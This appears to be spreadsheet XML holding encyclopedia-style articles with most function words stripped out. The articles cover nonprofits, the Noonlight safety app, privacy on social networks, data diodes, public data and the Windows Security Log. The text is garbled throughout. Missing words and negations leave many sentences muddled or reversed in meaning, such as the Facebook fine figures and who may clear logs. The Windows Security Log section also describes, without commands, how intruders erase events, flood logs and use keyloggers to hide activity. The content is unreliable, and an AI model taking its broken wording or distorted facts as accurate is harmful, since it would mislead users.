nonprofits apply tax-exempt status, organization exempt income taxes. united states, exempt federal income taxes, organization must meet requirements forth internal revenue code (irc). granting nonprofit status done state, granting tax-exempt designation (such 501(c)) granted federal government irs. this means nonprofits eligible tax-exempt. example, employees non-profit organizations taxes salaries, receive according laws country. npos model double bottom line furthering cause important making profit, though needed ensure organization's sustainability. advantage non-profit organisations registered benefit reliefs exemptions. charities non-profits exempt corporation well trustees exempt income tax. social welfare nonprofits u.s., "social welfare" nonprofits (irs section 501(c)(4)) frequently used politicians. their resulted controversies politicians kwame kilpatrick gretchen whitmer. problems founder's syndrome founder's syndrome issue organizations experience expand. dynamic founders, strong vision operate project, retain control organization, even employees volunteers want expand project's scope change policy. resource mismanagement resource mismanagement particular problem npos employees accountable anyone direct stake organization. example, employee start program without disclosing complete liabilities. employee rewarded improving npo's reputation, making employees happy, attracting donors. liabilities promised full faith credit organization recorded anywhere constitute accounting fraud. even indirect liabilities negatively affect financial sustainability npo, financial problems unless strict controls instated. some commenters argued receipt significant funding large for-profit corporations ultimately alter npo's functions. frequent measure npo's efficiency expense ratio (i.e. expenditures things programs, divided total expenditures). competition talent competition employees public private sector another problem nonprofit organizations inevitably face, particularly management positions. there reports major talent shortages nonprofit sector today regarding newly graduated workers, npos long relegated hiring secondary priority, could find position many while many established npos well-funded comparative public sector competitors, many independent must creative incentives attract maintain vibrant personalities. initial interest many remuneration package, though many questioned leaving reported stressful work environments implacable work drove away.public- private-sector employment have, part, able offer employees nonprofit agencies throughout history. either form higher wages, comprehensive benefit packages, less tedious work, public private sectors enjoyed advantage npos attracting employees. traditionally, attracted mission-driven individuals want assist chosen cause. compounding issue npos operate manner similar businesses, seasonally. this leads many young driven employees forego npos favor stable employment. today, however, nonprofit organizations adopting methods used competitors finding means retain employees attract best newly minted workforce.it mentioned nonprofits never able match private sector therefore focus attention benefits packages, incentives implementing pleasurable work environments. good environment ranked higher salary pressure work. npos encouraged much able offer low-stress work environment employee associate positively with. other incentives implemented generous vacation allowances flexible work hours. online presence many npos often .org country code top-level domain respective country) .edu top-level domain (tld) selecting domain name differentiate commercial entities, typically .com space. traditional domain noted 1591, .org 'organizations anywhere else' naming system, implies proper category non-commercial organizations governmental, educational, types specific tld. designated specifically charitable organizations specific organizational tax-law status; however, encompasses anything classifiable another category. currently, restrictions enforced registration .com .org, find organizations sorts either domains, well top-level domains including newer, specific ones apply particular sorts organization including .museum museums .coop cooperatives. organizations might also register appropriate country code top-level domain country. alternative names instead defined 'non' words, organizations suggesting new, positive-sounding terminology describe sector. term 'civil society organization' (cso) used growing number organizations, including center study global governance. term 'citizen sector organization' (cso) also advocated describe sector citizens, citizens organizations including ashoka: innovators public. advocates argue terms describe sector terms, without relying terminology used government business sectors. however, terminology nonprofit self-descriptive language legally compliant risks confusing public nonprofit abilities, capabilities, limitations.in spanish-language jurisdictions, nonprofit organizations called "civil associations". also references further reading snyder, gary nonprofits: brink nonprofits lost essentials bring back, 2006. hartigan, 2006, 'it's people, profits', business strategy review, winter 2006 external links nonprofit resources curlie nonprofits philanthropy research issuelab</t>
  </si>
  <si>
    <t>Noonlight</t>
  </si>
  <si>
    <t>noonlight, formerly safetrek, connected safety platform mobile trigger requests emergency services. noonlight users trigger alarm clicking button. users connect smart devices, automatically trigger alarms them. available android devices. protected million users since 2013 handled 50,000 emergencies across u.s. noonlight developed zach winkler, company's ceo. background created 2013 university missouri response high number crime reports slow identification location people making calls services. winkler notes "what realize 9-1-1 really doesn’t location call them. takes minutes sometimes 300-meter accuracy reading are". noonlight able obtain users' exact location within meters seconds triggering alarm.in february 2017, safetrek among promising start ups, according cnbc. connected safety noonlight originally started students point another safely, allows users connect apps smart devices noonlight app. this creates users help even unable unaware emergency allowing connected device trigger noonlight alarm them. this solution also sends first responders vital details make aware situation better prepared. also, users already memberships connected devices access safety button safety features noonlight. downtown louis collaboration 2016, downtown louis partnered safetrek offered six-month free subscription 4,000 downtown residents, available first-come, first-served basis.in 2018, louis metrolink contracted noonlight offer riders access noonlight's safety app. similarly, washington university louis offers free subscription students, faculty, staff. data collection analysis data collected background used better assess danger potential specific areas throughout u.s. sold insurance agencies individual user’s driving risk assessment example, data released noonlight showed intersection southern methodist university's campus users noonlight feel unsafe. noonlight team worked alongside local police departments create complementary police dashboard marks tracks locations users, well passes along vital information first responders collected connected apps devices. intention policy makers, agency leaders, individuals make better informed decisions, improve resource utilization, ultimately prevent emergencies happening first place. references external links official website</t>
  </si>
  <si>
    <t>Privacy concerns with social networking services</t>
  </si>
  <si>
    <t>since arrival early social networking sites early 2000s, online social networking platforms expanded exponentially, biggest names social media mid-2010s facebook, instagram, twitter snapchat. massive influx personal information become available online stored cloud user privacy forefront discussion regarding database's ability safely store personal information. extent users social media platform administrators access user profiles become topic ethical consideration, legality, awareness, boundaries subsequent privacy violations critical concerns advance technological age.a social network social structure made social actors (such individuals organizations), sets dyadic ties, social interactions actors. privacy concerns social networking services subset data privacy, involving right mandating personal privacy concerning storing, re-purposing, provision third parties, displaying information pertaining oneself internet. social network security privacy issues result large amounts information sites process day. features invite users participate in—messages, invitations, photos, open platform applications applications often venues others gain access user's private information. addition, technologies needed deal user's information intrude privacy. advent caused social profiling growing concern internet privacy. system facilitates participatory information sharing collaboration internet, social networking media websites like facebook myspace. these social networking sites seen boom popularity beginning late 2000s. through websites many people giving personal information internet. these social networks keep track interactions used sites save later use. issues include cyberstalking, location disclosure, social profiling, third party personal information disclosure, government social network websites investigations without safeguard search warrant. history before social networking sites exploded past decade, earlier forms social networking dated back 1997 degrees friendster. while social media platforms introduced, additional forms social networking included: online multiplayer games, blog forum sites, newsgroups, mailings lists dating services. they created backbone modern sites. since start sites, privacy become concern public. 1996, young woman york city first date online acquaintance later sued sexual harassment, date tried play sexual fantasies discussed online. this early example many issues come regarding internet privacy.in past, social networking sites primarily consisted capability chat others chat room, less popular social networks today. people using sites seen "techies" unlike users current era. early privacy cases regards myspace, "stalking minors, bullying, privacy issues", inevitably adoption "age requirements safety measures". common society events stalking "catfishing" occur. according kelly quinn, “the social media become ubiquitous, u.s. adults using social network sites today significantly higher levels among young adults females." social media sites grown popularity past decade, continue grow. majority united states population uses sort social media site. causes there several causes contribute invasion privacy throughout social networking platforms. recognized design, social media technologies contest mechanisms control access personal information, sharing user-generated content central function." this proves social networking companies need private information become public sites operate. they require people share connect other. this necessarily thing; however, must aware privacy concerns. even privacy settings, posts internet still shared people beyond user's followers friends. reason “english currently incapable protecting share social media information disseminated intend." information always chance unintentionally spread online. once something posted internet, becomes public longer private. users turn privacy settings accounts; however, guarantee information beyond intended audience. pictures posts saved posts never really deleted. 2013, research center found "60% teenage facebook users private profiles.” this proves privacy definitely something people still wish obtain.a person's life becomes much public social networking. social media sites allowed people connect many people person interactions. people connect users across world never chance meet person. this positive effects; however, also raises many concerns privacy. information posted person want getting out. book it's complicated, author, danah boyd, explains people “believe willingness share public spaces—and, certainly, exhibitionism publicity—is incompatible desire personal privacy." once something posted internet, becomes accessible multiple people even shared beyond assumed friends followers. many employers look person's social media hiring position. social media become tool people find information person's life. someone learn person based post even meet person. ability achieve privacy never ending process. boyd describes “achieving privacy requires ability control social situation navigating complex contextual cues, technical affordances social dynamics." society constantly changing; therefore, ability understand social situations obtain privacy regularly changed. various levels privacy offered social networking sites vary levels privacy offered. social networking sites like facebook, providing real names personal information encouraged site (onto page known 'profile'). this information usually consists birth date, current address, telephone number(s). some sites also allow users provide information interests, hobbies, favorite books films, even relationship status. however, social network sites, match.com, people prefer anonymous. thus, linking users real identity sometimes rather difficult. nevertheless, individuals sometimes identified face re-identification. studies done major social networking sites, found overlapping similar photographs, profile pictures similar pictures multiple sites matched identify users. people concern “according research conducted boston consulting group, privacy personal data issue percent global consumers percent u.s. consumers.” six-in-ten americans (61%) said would like protect privacy.for sites encourage information disclosure, noted majority users trouble disclosing personal information large group people. 2005, study performed analyze data facebook profiles students enrolled carnegie mellon university. revealed users gave genuine names, gave photograph easier identification. majority users also altered privacy setting, allowing large number unknown users access personal information (the default setting originally allowed friends, friends friends, non-friends network full view user's profile). possible users block users locating facebook, must done individual basis, would, therefore, appear commonly used wide number people. most users realize make security features facebook default setting restored update. many concerns users displaying much information social networking sites serious implications privacy. facebook criticized perceived laxity regarding privacy default setting users.the “privacy paradox” phenomenon occurs individuals, state concerns privacy online, take action secure accounts. furthermore, individuals take extra security steps online accounts, related banking finance, extend social media accounts. some basic simple security steps would include deleting cookies, browser history, checking one's computer spyware. some attribute lack action “third-person bias”. this occurs people aware risks, believe risks apply relate individuals. another explanation simple risk reward analysis. individuals willing risk privacy reap rewards active social media. oftentimes, risk exploited private information shared internet overshadowed rewards exclusively sharing personal information bolsters appeal social media user.in study velden emam, teenagers described “active users social media, seem care privacy, also reveal considerable amount personal information.” this brings issue managed privately social media, example privacy paradox. this study particular looked teenagers mental illness interact social media. researchers found place teenage patients stay up-to-date social life—it seen place discuss diagnosis treatment.” therefore, social media forum needs self-protection privacy. privacy main concern, especially teens entirely informed importance consequences public versus private use. example, “discrepancy stated privacy concerns disclosure private information.” user awareness social networking sites users often targets well source information social networking. users leave digital imprints browsing social networking sites services. identified online studies, users trust websites social networking sites. trust referred, "trust defined (mayer, davis, schoorman, 1995) "the willingness party vulnerable actions another party based expectation perform particular action important trustor, irrespective ability monitor control party" 712)". survey conducted carnegie mellon university, majority users provided living city, phone numbers among personal information, user clearly unaware consequences sharing certain information. adding insight, social networking users various cities, remote villages, towns, cultures, traditions, religions, background, economic classes, education background, time zones highlight significant awareness. survey results paper suggest, "these results show interaction trust privacy concern social networking sites understood sufficient degree allow accurate modeling behavior activity. results study encourage research effort understand development relationships online social environment reasons differences behavior different sites." reference, survey conducted among social networking users carnegie mellon university indicative following reasons lack user awareness: people's disregard privacy risks trust privacy protection offered social networking sites. availability user's personal details third-party tools/applications. apis frameworks also enable user, fair amount knowledge extract user's data. cross-site forgery possible website threats. there hence dire need improving user's awareness swiftly, order address growing security privacy concerns caused merely user's unawareness. social networking sites take responsibility make awareness possible means participatory methods virtual online means.to improve user's awareness, possible method privacy-related trainings people understand privacy concerns social media websites apps. trainings include information certain companies apps help secure user's privacy, skills protect user's privacy. data access methods there several ways third parties access user information. flickr example social media website provides geotagged photos allows users view exact location person visiting staying. geotagged photos make easy third party users individual located traveling there also growing phishing, reveals sensitive information secretive links downloads email, messages, communications. social media opened entirely realm hackers information normal posts messages. share third parties nearly popular applications facebook—including farmville, causes, quiz planet—have sharing users' information advertising tracking companies. even though facebook's privacy policy says provide "any non-personally identifiable attributes collected" advertisers, violate policy. user clicked specific page, facebook send user address page advertisers, directly lead profile page. case, easy identify users' names. example, take with learning allows teachers students keep track academic process. requires personal information includes, school name, user's name, email, age. take with learning created company known illegally gathering student's personal information without knowledge selling advertisement companies. this company violated children's online privacy protection (coppa), used keep children safe identity theft using internet. most recently, facebook scrutinized collection users' data cambridge analytica. cambridge analytica collecting data facebook users agreed take psychology questionnaire. could cambridge analytica access data person took survey, could also access data person's facebook friends. this data used hopefully sway people's’ beliefs hopes would vote certain politician. while cambridge analytica collecting data illegal, transferred data acquired third parties could used sway voters. facebook fined £500,000 $5bn (£4bn) 2020, company taken court australia's privacy regulator perspective imposing fine a$1.7m (£860,000). application programming interface (api) routines, protocols, tools building software applications. using query language, sharing content data communities applications became much easier. apis simplify limiting outside program access specific features—often enough, requests data sort another. apis clearly define exactly program interact rest software world—saving time.an allows software “speak software.” furthermore, collect provide information publicly accessible. this extremely enticing researchers greater number possible avenues research. data collection focal point privacy conversation, data anonymous, difficulty understanding becomes invasion privacy. personal information collected masse, debate whether breaches personal privacy inability match information specific people.there however concerns recent scandal facebook political consulting firm, cambridge analytica. what happened “facebook allowed third-party developer engineer application sole purpose gathering data. developer able exploit loophole gather information people used friends without knowing.” search engines search engines easy find information without scanning every site yourself. keywords typed search lead results. necessary make sure keywords typed precise correct. there many search engines, lead user fake sites obtain personal information laden viruses. furthermore, search engines, like duckduckgo, violate user's privacy. location data social media websites, user's geographical location gathered either users (through voluntary check-in applications like foursquare facebook places) applications (through technologies like address geolocation, cellphone network triangulation, rfid gps). approach used matters less result holds content produced coupled geographical location user produced additionally, many applications attach contents forms information like language, device type capture time. result posting, tweeting taking pictures, users produce share enormous amount personal information. email phone number leaks many large platforms reveal part user's email address phone number using 'forgotten password' function. often whole email address derived hint phone digits compared known numbers. benefit data this accessible data along data mining technology, users' information used different ways improve customer service. according retweet, like hashtag, twitter recommend topics advertisements. twitter's suggestions follow done recommendation system. commerce, amazon, make users' information recommend items users. recommendations based least prior purchases, shopping cart, wishlist. affinity analysis data mining technique used understand purchase behavior customers. using machine learning method, whether user potential follower starbucks predicted. case, possible improve quality coverage applications. addition, user profiles used identify similar users. according gary kovacs's speech tracking online trackers, used internet find answer question, even bites breakfast already nearly sites tracking me", navigated them. privacy concerns studies shown people's belief right privacy pivotal predictor attitudes concerning online privacy. social profiling third party disclosure privacy 1974 united states federal law) states: agency shall disclose record contained system records means communication person, another agency, except pursuant written request prior written consent individual record pertains [subject exceptions]." u.s.c. 552a(b).disclosure context refers means communication, written, oral, electronic mechanical. this states agencies forbidden give out, disclose, information individual without given consent individual release information. however, falls individual prove wrongful disclosure, disclosure general, occurred. because social networking sites facebook permission third-party application requesting user's information. although privacy 1974 limit privacy invasion third party disclosure, list series twelve exceptions deem disclosure permissible: members agency need information performance duties". freedom information requires information information disclosed compatible purpose collected". bureau census needs information complete particular census. third party explicitly informs individual information collected serve form "statistical research" "individually identifiable". historically relevant added national archives records administration. information requested enforcement agency. information deemed beneficial "health safety individual". information requested house congress subcommittees. information requested head government accountability office authorized representatives". information requested court order. information requested debt collection act.social profiling allows facebook social networking media websites filtering advertisements, assigning specific ones specific groups, gender groups, even ethnicities.data aggregation sites like spokeo highlighted feasibility aggregating social data across social sites well integrating public records. 2011 study highlighted issues measuring amount unintended information leakage large number users varying number social networks. identified measured information could used attacks what-you-know security. studies also pointed social networks unintentionally providing third party advertising tracking sites personal information. raises issue private information inadvertently sent third party advertising sites referrer strings cookies. civil libertarians worry social networking sites, particularly facebook, greatly diminished user confidentiality numerous ways. thing, social media platforms store private data, also complete access material well. sustain profitability, applications like facebook examine market personal information logging data cookies, small files stockpile data someone's device. companies, facebook, carry extensive amounts private user information file, regarding individuals’ “likes, dislikes, preferences”, high value marketers. facebook reveals user information advertising marketing organizations, personalized endorsements appear news feeds based “surfing behavior, hobbies, culture preferences”. reasons, facebook's critics fear social networking companies seek business ventures stockholders sharing user information exchange profits. additionally, argue since facebook demonstrates illusion privacy presented “for-friends-only” type platform, individuals find inclined showcase personal information online. according critics, users might notice sponsorships commercials tailored disclosed private data, could result sense betrayal. institutional number institutions expressed concern lack privacy granted users social networking sites. these include schools, libraries, government agencies. libraries libraries particular, concerned privacy individuals, debated allowing library patrons access social networking sites public library computers. while librarians reportedly express real concern social networking privacy, particularly vocal voicing concerns. some argued lack privacy found social networking sites contrary ethics supported library organizations, latter thus extremely apprehensive dealing former. supporters view present argument code ethics held american library association based chartered institute library information professionals, affirms commitment upholding privacy fundamental right. 2008, study performed fourteen public libraries found blocked access social networking sites. many school libraries also blocked facebook fear children disclosing much information facebook. however, 2011, facebook taken efforts combat concern deleting profiles users thirteen. potential dangers identity theft much information provided things deduced, person's social security number, used part identity theft. 2009, researchers carnegie mellon university published study showing possible predict sometimes individual's 9-digit social security number using information gleaned social networks online databases. (see predicting social security numbers public data acquisti gross). response, various groups advised users either display number, hide facebook 'friends' personally know. cases also appeared users photographs stolen social networking sites order assist identity theft. according huffington post, bulgarian consultant bogomil shopov claimed recent blog purchased personal information million facebook users, shockingly price us$5.00. data reportedly included users' full names, email addresses, links facebook pages. following information could used steal users' identities full names including middle name, date birth, hometown, relationship status, residential information, hobbies interest. preteens early teenagers among groups, general, vulnerable victims private-information-sharing behavior preteens early teenagers. according research, many teens report social media social networking services important building relationships friendships. with fact comes privacy concerns identity theft, stealing personal information, data usage advertising companies. besides using social media connect, teenagers social networking services political purposes obtaining information. however, sometimes social media become place harassment disrespectful political debates fuels resentment rises privacy concerns.there restrictions numerous websites effective debatable. findings unveiled informative opportunities regarding internet privacy well concerns parents, teachers, peers, play significant role impacting internet user's behavior regards online privacy. additionally, studies also found heightening adolescents' concern towards privacy also lead greater probability utilize privacy-protecting behaviors. technological culture society developing into, adolescents' parent's awareness risen, society whole acknowledge importance online privacy.preteens early teenagers particularly susceptible social pressures encourage young people reveal personal data posting online. teens often post information personal life, activities doing, sharing current locations, spend time with, well thoughts opinions. they tend share information want feel left judged adolescents practicing sharing activities already. teens motivated keep date latest gossip, current trends, trending news and, allowing become victims cyberbullying, stalking, future, could potentially harm pursuing opportunities, context privacy, become inclined share private information public. this concerning preteens teenagers least educated public social media protect online, detrimental consequences could come sharing much personal information online. young individuals joining social media sites, believe acceptable post whatever thinking, realize potential harm information sacrificing privacy. "teens sharing information social media sites past." preteens teenagers sharing information social media sites facebook, snapchat, instagram, twitter, pinterest, posting pictures videos unaware privacy sacrificing. adolescents post real name, birthdays, email addresses social media profiles. children less mobility past. everything teenagers online stay loop social opportunities, concern traceable persistent environment motivates people continue sharing information well. consequently, continue social media sites facebook, despite knowing exists potential privacy risks.california also taking steps protect privacy social media users users’ judgments. 2013, california enacted would require social media sites allow young registered users erase comments sites. this first step united states toward “right forgotten” debated around world past decade. sexual predators most major social networking sites committed ensuring services safe possible. however, high content personal information placed social networking sites, well ability hide behind pseudo-identity, sites become increasingly popular sexual predators online. further, lack verification mechanisms cause concern social networking platforms. however, also suggested majority simply transferred using services provided facebook. while numbers remain small, noted number sexual predators caught using social networking sites increasing, reached almost weekly basis. worst cases children become victims pedophiles lured meet strangers.they sexual predators lurk anonymously wormholes cyberspace access victim profiles online. number highly publicized cases demonstrated threat posed users, peter chapman who, false name, added 3,000 friends went rape murder 17-year-old girl 2009. another case, 12-year-old, evergreen girl safely found help facebook, mother learning daughter's conversation popular social networking application. stalking potential ability stalking users social networking sites noted shared. popular social networking sites make easy build friends acquaintances share photos, whereabouts, contact information, interests without ever getting chance actually meet them. with amount information users post online, easy users become victim stalking without even aware risk. facebook profiles visible public, meaning google someone's name "+facebook" search pretty much person profile. study facebook profiles students carnegie mellon university revealed profiles included current resident least classes studied, theoretically allowing viewers know precise location individuals specific times. attracted controversy instant messenger permits users 'buddies' without knowing, therefore track user online. concerns also raised relative ease people read private messages e-mails social networking sites. cyberstalking criminal offense comes play state anti-stalking laws, slander laws, harassment laws. cyberstalking conviction result restraining order, probation, even criminal penalties assailant, including jail.some applications explicitly centered "cyber stalking." application named "creepy" track person's location using photos uploaded twitter flickr. when person uploads photos social networking site, others able track recent location. some smartphones able embed longitude latitude coordinates photo automatically send information application. anybody using application search specific person find immediate location. this poses many potential threats users share information large group followers.facebook "places," facebook service, publicizes user location information networking community. users allowed "check-in" various locations including retail stores, convenience stores, restaurants. also, users able create "place," disclosing personal information onto internet. this form location tracking automated must turned manually. various settings must turned manipulated order user ensure privacy. according epic.org, facebook users recommended disable "friends check places," customize "places check in," disable "people here now," uncheck "places i've visited.". moreover, federal trade commission received complaints regards facebook's "unfair deceptive" trade practices, used target advertising sectors online community. "places" tracks user location information used primarily advertising purposes. each location tracked allows third party advertisers customize advertisements suit one's interests. currently, federal trade commissioner along electronic privacy information center shedding light issues location data tracking social networking sites. unintentional fame unintentional fame harm person's character, reputation, relationships, chance employment, privacy- ultimately infringing upon person's right pursuit happiness. many cases unintentional fame victims take legal action. right forgotten legal concept includes removing one's information media available public. right forgotten currently enforced european union argentina, recognized various cases united states, particularly case melvin reid. however, controversy surrounding right forgotten united states conflicts public's right know constitution's first amendment, restricting one's “right freedom speech freedom expression” (amendment privacy concerns also raised number high-profile incidents considered embarrassing users. various internet memes started social networking sites used means towards spread across internet. 2002, canadian teenager became known star wars video using golf club light sabre posted internet without consent. video quickly became hit, much embarrassment teenager, claims suffered result. along incidents videos posted social networking sites, highlights ability personal information rapidly transferred users. employment issues relating privacy employment becoming concern regards social networking sites. 2008, estimated careerbuilder.com five employers search social networking sites order screen potential candidates (increasing 2006). majority employers, action acquire negative information candidates. example, managers considered information relating candidates' alcohol drug concern. other concerns investigated social networking sites included poor communication skills, inappropriate photographs, inaccurate qualifications bad-mouthing former employers/colleagues. however, manager claimed information found social networking site persuaded hire candidate, suggesting user image used positive way. while little doubt employers continue social networking sites means monitoring staff screening potential candidates, noted actions illegal jurisdictions. according workforce.com, employers facebook myspace could potentially face legal action: potential employer uses social networking site check candidate rejects person based see, could charged discrimination. august 2012, illinois joined state maryland (law passed march 2012) prohibiting employer access social media sites employees prospective employees. number states also considering prohibitory legislation (california, delaware, massachusetts, michigan, minnesota, missouri, jersey, york, ohio, south carolina washington), united states congress. april 2012, social networking online protection (2012 h.r. 5050) introduced united states house representatives, password protection 2012 (2012 3074) introduced united states senate 2012, prohibit employers requiring access employees' social media sites.with recent concerns technologies, united states developing laws regulations protect certain aspects people's information different medias.[cr4] example, states currently laws specifically restricting employers demanding access employees’ social media sites sites fully public. (the states passed laws arkansas, california, colorado, illinois, maryland, michigan, jersey, mexico, nevada, oregon, utah, washington.)monitoring social networking sites limited potential workers. issues relating privacy becoming increasing concern currently employment. number high-profile cases appeared individuals sacked posting comments social networking considered disparaging current employers fellow workers. 2009, sixteen-year-old kimberley swann sacked position ivell marketing logistics limited describing 'boring'. 2008, virgin atlantic sacked thirteen cabin crew staff, emerged used criticized company's safety standards called passengers 'chavs' facebook. there federal aware employer breaking monitoring employees social networking sites. fact, employers even hire third-party companies monitor online employee activity them. according article read write employers service "make sure employees leak sensitive information social networks engage behavior could damage company's reputation." while employers found usages social networking sites convenient, complaints forward civil liberties groups trade unions invasive approach adopted many employers. response kimberley swann case, brendan barber, union stated that: most employers dream following staff sounding work friends," said. "just snooping personal conversations possible days, make healthy." monitoring staff's social networking activities also becoming increasingly common method ensuring employees browsing websites work hours. estimated 2010 average million employees spent hour social networking sites, costing potentially billion. online victimization social networks designed individuals socially interact people internet. however, individuals engage undesirable online social behaviors, negatively impacts people's online experiences. crea</t>
  </si>
  <si>
    <t>Unidirectional network</t>
  </si>
  <si>
    <t>unidirectional network (also referred unidirectional gateway data diode) network appliance device allows data travel direction. data diodes found commonly high security environments, defense, serve connections networks differing security classifications. given rise industrial digitization, technology found industrial control level facilities nuclear power plants, power generation safety critical systems like railway networks.after years development, data diodes evolved network appliance device allowing data travel direction, used guaranteeing information security protection critical digital systems, industrial control systems, inbound cyber attacks, combinations hardware software running proxy computers source destination networks. hardware enforces physical unidirectionality, software replicates databases emulates protocol servers handle bi-directional communication. data diodes capable transferring multiple protocols data types simultaneously. contains broader range cybersecurity features like secure boot, certificate management, data integrity, forward error correction (fec), secure communication tls, among others. unique characteristic data transferred deterministically predetermined locations) protocol "break" allows data transferred data diode. data diodes commonly found high security military government environments, becoming widely spread sectors like gas, water/wastewater, airplanes (between flight control units in-flight entertainment systems), manufacturing cloud connectivity industrial iot. regulations increased demand increased capacity, major technology vendors lowered cost core technology. history first data diodes developed governmental organizations eighties nineties. because organizations work confidential information, making sure network secure highest priority. primary solutions used organizations gaps. but, amount transferable data increased, continuous real-time data stream became important, organizations look automated solution. search standardization, increasing number organizations started look solution better activities. commercial solutions created stable organizations succeeded given level security long-term support. united states, utilities companies used data diodes several years, regulators encouraged protect equipment processes safety instrumented systems (siss). nuclear regulatory commission (nrc) mandates data diodes many sectors, addition electrical nuclear, also data diodes effectively.in europe, regulators operators several safety-critical systems started recommending implementing regulations unidirectional gateways.in 2013 working, industrial control system cybersecurity, directed french network information security agency (anssi) stated forbidden firewalls connect class network, railway switching systems, lower class network corporate network, unidirectional technology permitted. applications real time monitoring safety-critical networks secure bridge secure cloud connectivity critical networks database replication data mining trusted back-end hybrid cloud hosted solutions (private public) secure data exchange data marketplaces secure credential/ certificate provisioning secure cross-data base sharing secure printing less secure network high secure network (reducing print costs) transferring application operating system updates less secure network high secure network time synchronization highly secure networks file transfer streaming video sending/receiving alerts alarms open critical/confidential networks sending/receiving emails open critical/confidential networks government commercial companies unidirectional network devices typically used guarantee information security protection critical digital systems, industrial control systems, cyber attacks. while devices common high security environments defense, serve connections networks differing security classifications, technology also used enforce one-way communications outbound critical digital systems untrusted networks connected internet. physical nature unidirectional networks allows data pass side network connection another, around. this "low side" untrusted network, "high side" trusted network, vice versa. first case, data high side network kept confidential users retain access data side. such functionality attractive sensitive data stored network requires connectivity internet: high side receive internet data side, data high side accessible internet-based intrusion. second case, safety-critical physical system made accessible online monitoring, insulated internet-based attacks might seek cause physical damage. cases, connection remains unidirectional even high network compromised, security guarantees physical nature. there general models using unidirectional network connections. classical model, purpose data diode prevent export classified data secure machine allowing import data insecure machine. alternative model, diode used allow export data protected machine preventing attacks machine. these described detail below. one-way flow less secure systems involves systems must secured remote/external attacks public networks publishing information networks. example, election management system used electronic voting must make election results available public time must immune attack.this model applicable variety critical infrastructure protection problems, protection data network less important reliable control correct operation network. example, public living downstream needs up-to-date information outflow, information critical input control system floodgates. situation, critical flow information secure control system public, vice versa. one-way flow secure systems majority unidirectional network applications category defense, defense contractors. these organizations traditionally applied gaps keep classified data physically separate internet connection. with introduction unidirectional networks environments, degree connectivity safely exist network classified data, network internet connection. bell-lapadula security model, users computer system create data security level. this applies contexts hierarchy information classifications. users security level share machine dedicated level, machines connected data diodes, bell-lapadula constraints rigidly enforced. benefits traditionally, network provides server access authorized user, data vulnerable intrusions network. however, unidirectional gateways separating critical side network sensitive data open side business internet connectivity, normally network, organizations achieve best worlds, enabling connectivity required assuring security. this holds true even network compromised, traffic flow control physical nature. reported cases data diodes bypassed exploited enable two-way traffic. lower long-term operating cost (opex) cost rules maintain. although software updates installed. often devices need maintained vendors. unidirectional software layer cannot configured allow two-way traffic physical disconnection line. weaknesses june 2015, unidirectional gateways commonly used well understood. unidirectional gateways unable route majority network traffic break protocols. cost; data diodes originally expensive, although lower cost solutions available. specific cases require two-way data flow difficult achieve. variations simplest form unidirectional network modified, fiber-optic network link, send receive transceivers removed disconnected direction, link failure protection mechanisms disabled. some commercial products rely basic design, software functionality provides applications interface helps pass data across link. all-optical data diodes support high channel capacities among simplest. 2019, controlled interfaces demonstrated (now patented) one-way optical fiber link using 100g commercial shelf transceivers pair arista network switch platforms. specialized driver software required. other sophisticated commercial offerings enable simultaneous one-way data transfer multiple protocols usually require bidirectional links. german companies infodas genua developed software based ("logical") data diodes microkernel operating system ensure unidirectional data transfer. software architecture solutions offer higher speed conventional hardware based data diodes. engineering, developed secure e-application gateway, consisting multiple data diodes software components, enable real-time bi-directional http(s) services transactions internet protecting secured networks malicious injects data leakage.in 2018, siemens mobility released industrial grade unidirectional gateway solution data diode, data capture unit, uses electromagnetic induction chip design achieve safety assessment, guaranteeing secure connectivity existing safety critical systems safety integrity level (sil) enable secure provide data analytics cloud hosted digital services.the naval research laboratory (nrl) developed unidirectional network called network pump. this many ways similar dsto's work, except allows limited backchannel going high side side transmission acknowledgments. this technology allows protocols used network, introduces potential covert channel high- low-side compromised artificially delaying timing acknowledgment.different implementations also differing levels third party certification accreditation. cross domain guard intended military context require extensive third party certification accreditation. data diode intended industrial use, however, require third party certification accreditation all, depending application. notable vendors fox-it systems us/uk siemens germany engineering singapore cyberdefense fend incorporated waterfall security israel also bell-lapadula model security network intrusion detection system references external links sans institute paper tactical data diodes industrial automation andcontrol systems. guide industrial control systems (ics) security united states department commerce national institute standards technology data diode industrial control systems. improving industrial control system cybersecurity defense-in-depth strategies united states department homeland security industrial control systems cyber emergency response team data diode use.</t>
  </si>
  <si>
    <t>Public data</t>
  </si>
  <si>
    <t>public data refer open data data inadvertently becomes public affecting information privacy</t>
  </si>
  <si>
    <t>Windows Security Log</t>
  </si>
  <si>
    <t>security log, microsoft windows, contains records login/logout activity security-related events specified system's audit policy. auditing allows administrators configure windows record operating system activity security log. security three logs viewable event viewer. local security authority subsystem service writes events log. security primary tools used administrators detect investigate attempted successful unauthorized activity troubleshoot problems; microsoft describes "your best last defense". audit policies govern also favorite targets hackers rogue system administrators seeking cover tracks committing unauthorized activity. types data logged audit policy record logins, successful login results user's user name computer name logged well user name logging into. depending version windows method login, address recorded. windows 2000 server, instance, addresses successful logins, windows server 2003 includes capability. categories events logged are: account logon events account management directory service access logon events object access policy change privilege process tracking system eventsthe sheer number loggable events means security analysis time-consuming task. third-party utilities developed help identify suspicious trends. also possible filter using customized criteria. attacks countermeasures administrators allowed view clear (there separate rights view clear log). addition, administrator winzapper delete specific events log. reason, administrator account compromised, event history contained security unreliable. defense remote server services shut off, allowing console access.as approaches maximum size, either overwrite events stop logging events. this makes susceptible attacks intruder flood generating large number events. partial defense increase maximum size greater number events required flood log. possible overwrite events, chris benton notes, "the problem really habit crashing logs become full".randy franklin smith's ultimate windows security points given ability administrators manipulate security cover unauthorized activity, separation duty operations security-monitoring staff, combined frequent backups server accessible latter, improve security.another defeat security would user administrator change auditing policies stop logging unauthorized activity intends carry out. policy change could logged, depending "audit policy change" setting, event could deleted using winzapper; point onward, activity would generate trail security log.microsoft notes, possible detect attempts elude security monitoring solution techniques, challenging many events occur attempt cover tracks intrusive activity events occur regularly typical business network".as benton points out, preventing successful attacks security obscurity. keeping department's security systems practices confidential helps prevent users formulating ways cover tracks. users aware copied remote server every hour, instance, take measures defeat system attacking deleting relevant events next hour.log manipulation needed attacks. simply aware security works enough take precautions detection. instance, user wanting fellow employee's account corporate network might wait hours gain unobserved physical access computer cubicle; surreptitiously hardware keylogger obtain password; later user's account terminal services wi-fi hotspot whose address cannot traced back intruder. after cleared event viewer, entry immediately created freshly cleared noting time cleared admin cleared this information starting point investigation suspicious activity. addition windows security log, administrators check internet connection firewall security clues. writing false events theoretically possible write false events log. microsoft notes, able write security log, seauditprivilege required. default, local system network service 